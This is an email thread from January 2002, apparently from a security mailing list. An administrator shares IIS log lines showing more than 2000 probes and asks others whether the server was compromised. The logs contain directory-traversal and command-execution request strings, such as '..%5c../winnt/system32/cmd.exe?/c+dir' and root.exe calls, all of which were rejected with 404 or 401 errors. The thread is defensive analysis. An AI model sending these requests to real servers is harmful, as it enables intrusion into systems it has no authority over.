That was my worry also. Especially the "%5c" in the Double Decode (Unicode leaves a .../... footprint doesn't it?). Although the server is issuing 400 level error codes for *all* the attacks. Also I can find no abnormal processes running or ports open (using fport). The machine is current on all security patches (all patches period for that matter, I'm paranoid).
Jim Grossl Lee Pesky Learning Center Boise, Idaho USA -----Original Message----- From: Andrew Blevins [mailto:[EMAIL PROTECTED]] Sent: Wednesday, January 16, 2002 11:14 AM To: Jim Grossl Subject: RE: IIS log files, can I have your take on these attacks? It looks to me like Unicode has already happened here. Am I right anyone? Or way off? Blevins -----Original Message----- From: Jim Grossl [mailto:[EMAIL PROTECTED]] Sent: Tuesday, January 15, 2002 8:24 AM To: [EMAIL PROTECTED] Subject: IIS log files, can I have your take on these attacks? 207.225.190.149 -- [14/Jan/2002:10:30:22 -0700] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 3396 207.225.190.149 -- [14/Jan/2002:10:30:22 -0700] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 3396 207.225.190.149 -- [14/Jan/2002:10:30:22 -0700] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 3396 207.225.190.149 -- [14/Jan/2002:10:30:22 -0700] "GET /scripts/..%5c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 3396 207.225.190.149 -- [14/Jan/2002:10:30:23 -0700] "GET /_vti_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 401 3837 207.225.190.149 - - [14/Jan/2002:10:30:25 -0700] "GET /scripts/..%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 3396 I kind of bothers me to post these on an open list (apparently our Web server doesn't need any more "attention") but I would like to know what everyone thinks of these attacks. My Web server logged > 2000 of these attacks over the weekend. I'm pretty sure that attacks are not succeeding, but I've read that if the "%5c" shows up in the Double Decode attack that the file traversal is taking place. Thanks. Jim Grossl
